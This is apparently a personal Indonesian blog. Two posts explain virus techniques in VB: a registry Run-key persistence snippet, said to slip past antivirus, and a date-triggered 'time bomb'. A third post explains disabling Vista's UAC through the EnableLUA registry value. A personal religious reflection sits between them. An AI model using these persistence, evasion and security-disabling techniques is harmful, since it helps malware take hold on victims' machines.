Konsep autorun pada virus dengan VB

Dari beberapa script virus local yang udah terbaca, ternyata ada beberapa listing program yang keren banget. Dan usut punya kusut, ternyata script tersebut berguna untuk melakukan pertahanan di awal terhadap antivirus. Langsung aja yach kita lihat listingnya :

Source code Module

Public Sub CreateKey(folder As String, Value As String)

Dim satya As Object
On Error Resume Next
Set satya = CreateObject(“Wscript.Shell”)
satya.RegWrite folder, Value
End Sub

Sub Main ( )
Dim satya As String
satya = “”"”
CreateKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\satyaflagel”, _
satya & “c:\windows\NOTEPAD.exe” & satya
End Sub

penjelasan code modul
1.deklarasi level public create key,terdiri dari folder dan value
2.deklarasi satya sebagi object
3.jika ada kesalahan coding, maka lanjutin ke code selanjutnya
4.menset satya sebagi fungsi vb script
5.fungsi regwrite satya untuk menulis registry
6.deklarasi satya sebagai strting
7.menulis file exe yang akan dijalankan secara otomatis melalui registry

Kalo dicermati, ada 1 script yang aneh dan paling keren menurutku, yaitu lihat pada pemakaian fungsi VBScript (Wscript.shell), ini menurutku digunakan untuk melakukan anti deteksi mallcode dari antivirus. Jadi intinya VBScriptnya tidak langsung digunakan untuk menulis, malainkan dimasukan dalan listing program VB. Sebagai hasilnya:

Uhui……anti virus manapun lewat dah……..tp sekarang anti virus dah pada hebat kox.

Konsep Time Bomb pada virus dengan VB

Dari beberapa virus ada yang make teknik ini untuk melancarkan aksinya dengan setting waktu (hari ,tanggal,jam). Ini bener2 lucu menurutku, soalnya mungkin mereka yang disebut sebagi virus script write mahu pamer teknik2 lucunya, dan sebagaimana hasilnya muncul dech virus2 yang pada hari dan jam tertentu hidup. Untuk source code nya adalah :

source code form

Dim satyasekarang
Dim satyajam
Form1.WindowState = 1
satyasekarang = Format(Now, “dd/mm/yyyy”)
satyajam = Format(Time, “hh:mm:ss”)

If satyasekarang = “29/1/2007″ And satyajam = “08:13:00″ Then
Shell “notepad.exe”
MsgBox “satya gi bingung nich, apakah perasaan ini benar terhadapnya, aku berharap dia adalah sosok baru yg memberikan kekuatan dalam islam dan imanku!!!”, vbCritical
Else
Set satyasekarang = Nothing
Set satyajam = Nothing
GoTo perulangan

End If

Penjelasan coding :
1.deklarasi satyasekarang dan satya jam
2.windowstate untuk minimize program
3.menset satyasekarang adalah sekarang tanggal berapa?, dan menset satyajam adalah menujukan waktu yang dipunyai windows secara default.
4.melakukan looping, jika sekarang tanggal x dan jam y maka akan dijalankan Notepad.exe
(ini nanti yang bisa diganti dengan file master virus, tinggal tulis path nya)
5.muncul deh pesen satya_flagel,….he..heee
6.menset memori satyasekarang dan satyajam adalah kosong, untuk memperkecil memori yg dipake.
7.perintah Go To untuk melakukan perulangan kembali secara continue.

Moga bermanfaat yach,
Sumber asli : satya baca di aat sadewa

Arti sebuah waktu

Apakah benar ketika aku sadar di suatu waktu dan aku terus merubah segalanya, setidaknya kelemahanku?. Apakah benar ketika aku paham untuk mempertahankan sesuatu aku harus berusaha menjaganya, seidaknya dalam bentuk semangat seperti diawal aku pengen mendapatkanya?. & ketika itu terjadi pasti ak berasumtif, “ apa yang terjadi ketika aku melakukan hal yang berbeda dengan ketajaman intelegensi saat ini ??”, dan jawaban yang ada adalah “hal ini semua pasti tidak akan terjadi”, karena pada dasarnya aku sudah mengantisipasinya dangan konsisten dijalanya.

Apakah arti dari bermain dengan waktu & apakah arti dari sebuah perioritas?. Ketika mungkin orang sadar dengan segala kekuranganya, setidaknya tentang kekosongan waktu dan tindakan pada saat itu. Jawaban yang ada adalah “ kanapa aku tidak melakukanya disaat dulu??”, dan mungkin saat itu semua sudah terjadi tanpa ku bias kembali kemasa dulu.

Maka Allah SWT. Tidak pernah tidak memberikan suatu isyarat kepada hambanya tentang maslah itu semua. “ QS : AL- Ashr ”

Vista Attack

Kali ne ngomongin vista. OS kmaren sore punya Microsoft ne controversial banget. Kesan pertama aku pake adalah boros sumber daya, ribet, dan penuh dengan authorization. Orang seperti ak yang g sabaran bisa dibikin gerah ma ulah ne OS, y walopun disatu sisi faktort 1 ne dijadikan kelebihan ketimbang XP, tp biasalah..namanya jg baru promo. Komponen terbaru dari ne OS lebih terfokus terhadapa security nya, sebut aja UAC ( User Account Control ), ne merupakan dedengkot pengatur keamann di Vista, dimana hak semua akses dibatasi dalam menjalankan sebuah aplikasi. Yang menarik adalah, bahwa level Administrator aja tetep diberlakukan sebagai LUA ( Limited User Accses).Hal ini tentunya segala macam perubahan yang dulu semisal ancar2 aja dilakukan di Xp, sekarang menjadi mustahil tanpa seizing dari User. Kotornya, tiap aplikasi jalan pasti butuh yang namanya Allow program biar lewat dari UAC. Bahkan UAC sendiri sering disebut sebagai tameng dari virus. Hampir semua virus yang jalan di XP tidak mempan lagi jika suruh ngoprek di Vista. Hal itu tentunya aku logikan dimana virus itu sendiri jg tersusun sebagai aplikasi ka??, walopun main hati nya adalah mallcode system, so hal ini tetep melewati yang namanya UAC juga.

Sekarang yang jadi masalah kl missal ne UAC mati,,so what happen bro????.(jangn berpikir itu dl yeee!!!). Yang harus dipikirkan adalah gimana kjadianya kux bias ni UAC bias mati???.

Answer : UAC tidaklah lolos dari yang namanya under registry!!!!!!!!!!!!!

Address : HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\

System\EnableLUA

Value : 0

Bagi para mallcoder untuk ngerubah ne string pun mudah dilakukan. Mungkin dengan syntax 4 baris aja udah beres…ya paling sama halnya seperti teknik yang dipake brontok family buat ngilangin folder option.

Bahkan lewat CP pun bias di non aktifin.

Cuma sampe sekarang masih terngiang, knapa pihak Microsoft masang UAC under registry, yang notabenya itu merupakan hal yang bias dimanfaatin bagi mallcoder. Makanya sekarang ini menurutku Vista belumlah sehebat yang aku bayangin, mungkin ntar kl udah ngeluarin Vista SP1,2,dan setyerusny. Itu baru mungkin aku punya alasan buat make tu OS.

NB: orang ak aja masih comfort dengan XP sp2…ya iyalah,.,.pa lg aku make multi OS,.,.ak gabung ma Fedora.